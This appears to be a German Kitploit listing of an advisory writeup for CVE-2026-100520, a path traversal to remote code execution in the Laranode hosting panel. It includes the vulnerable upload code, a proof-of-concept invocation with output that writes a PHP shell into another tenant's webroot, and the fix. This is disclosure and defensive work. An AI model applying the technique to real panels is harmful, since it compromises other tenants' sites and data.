Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-100520-laranode-path-traversal — Path Traversal -> RCE in Laranode < 1.2.1 (CWE-22). PoC + Advisory-Writeup. | Kitploit
Tools/GitHubGitHub/wvllxe/cve-2026-100520-laranode-path-traversal
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRemote-Access-Tool
GitHubwvllxe/cve-2026-100520-laranode-path-traversal

CVE-2026-100520-laranode-path-traversal

Path Traversal -> RCE in Laranode < 1.2.1 (CWE-22). PoC + Advisory-Writeup.

Repository anzeigen
25vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-100520 — Path Traversal → RCE im Laranode File Manager

Autorisierte Sicherheitsforschung. PoC nur für defensive und edukative Zwecke.

CVSS 3.1 CVSS 4.0 CWE-22 Status

Authentifizierter Path Traversal im Upload-Endpunkt des File-Managers von Laranode ermöglicht es einem Mandanten mit geringen Rechten, beliebige Dateien außerhalb seines eigenen Home-Verzeichnisses zu schreiben — einschließlich einer PHP-Webshell in das Web-Root eines anderen Mandanten — was zur Remote-Code-Ausführung als dieser Mandant führt.

CVECVE-2026-100520
ProduktLaranode (Multi-Tenant-Hosting-Control-Panel, Laravel)
Betroffen>= 0, < 1.2.1
Behoben inv1.2.1
SchwachstellePath Traversal (CWE-22) → Arbitrary File Write → RCE
BerechtigungenAuthentifiziert (jeder Panel-Benutzer mit geringen Rechten)
CVSS 3.18.8 HIGH — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.08.7 HIGH — AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H
Entdeckt vonAlisher Qarshibayev
AdvisoryVulnCheck · GHSA-34h2-2696-vfvr

Ursache

app/Actions/Filemanager/UploadFileAction.php erstellt den Zielpfad, indem die vom Benutzer bereitgestellten Request-Felder path und originalName direkt an das Home-Verzeichnis des Mandanten angehängt werden — ohne Kanonisierung und ohne Traversal-Prüfung:

// app/Actions/Filemanager/UploadFileAction.php  (< 1.2.1)
$r->validate([
    'file'         => 'required|file',
    'originalName' => 'required|string|max:255',
    'path'         => 'required|string',          // <-- attacker controlled, not sanitized
]);

$file = $r->file('file');

$path = '/home/' . $r->user()->systemUsername . '/' . $r->path;   // <-- traversal sink

File::append($path . '/' . $r->originalName, $file->get());        // <-- arbitrary write

Die Route ist nur durch auth geschützt — jeder authentifizierte Mandant kann sie erreichen:

// routes/web.php
Route::post('/filemanager/upload-file', [FilemanagerController::class, 'uploadFile'])
     ->middleware(['auth'])->name('filemanager.uploadFile');

Da path ../-Sequenzen akzeptiert, entkommt ein Wert wie ../victim/public_html dem Home-Verzeichnis des Aufrufers und platziert den Upload im Web-Root eines anderen Mandanten. Das Schreiben einer .php-Datei dort führt zur Code-Ausführung, sobald sie über HTTP angefordert wird.

Proof of Concept

Voraussetzungen: ein gültiges Konto mit geringen Rechten auf der Ziel-Laranode-Instanz (dies ist das Privileg, das die CVE annimmt). Der PoC meldet sich an, holt das CSRF-Token und schreibt eine Marker-PHP-Datei über Traversal in das Web-Root eines benachbarten Mandanten.

python3 poc.py \
    --url https://panel.example.com \
    --user [email protected] \
    --pass 'Password123' \
    --victim victimuser \
    --webroot public_html

Erwartetes Ergebnis — der Server bestätigt das Schreibziel außerhalb des Home-Verzeichnisses des Angreifers:

[*] Logging in as [email protected] ...
[+] Authenticated, CSRF token acquired
[*] Uploading pwn_<rand>.php via path traversal ...
[+] Server destination: /home/victimuser/public_html/pwn_<rand>.php
[+] Verifying execution ...
[+] RCE confirmed: https://victim.example.com/pwn_<rand>.php -> CVE-2026-100520 <uname>

Siehe poc.py. Die Marker-Shell führt nur id/uname aus, um die Ausführung zu belegen — keine destruktiven Aktionen.

Auswirkung

  • Mandantenübergreifendes beliebiges Dateischreiben auf einem Shared-Hosting-Panel.
  • Remote-Code-Ausführung als jeder mitgehostete Mandant → vollständige Kompromittierung von dessen Website und Daten.
  • Durchbricht die zentrale Isolationsgarantie eines Multi-Tenant-Control-Panels.

Behebung

Upgrade auf Laranode 1.2.1 (Fix-Commit). Der Fix normalisiert den aufgelösten Pfad und lehnt jedes Ziel ab, das dem Home-Verzeichnis des Mandanten entkommt (realpath()-Containment-Prüfung). Allgemeine Empfehlung: Erstellen Sie niemals Dateisystempfade aus rohen Benutzereingaben — kanonisieren Sie sie und bestätigen Sie, dass das Ergebnis innerhalb eines erlaubten Basisverzeichnisses bleibt.

Zeitleiste

DatumEreignis
2026-09-21Datum der öffentlichen Offenlegung
2026-09-26CVE-2026-100520 reserviert & veröffentlicht (VulnCheck)

Offenlegung

Verantwortungsvoll an den Hersteller gemeldet und über VulnCheck koordiniert. Behoben in v1.2.1, bevor dieser PoC veröffentlicht wurde. Veröffentlicht für defensive und edukative Zwecke.

Tool herunterladen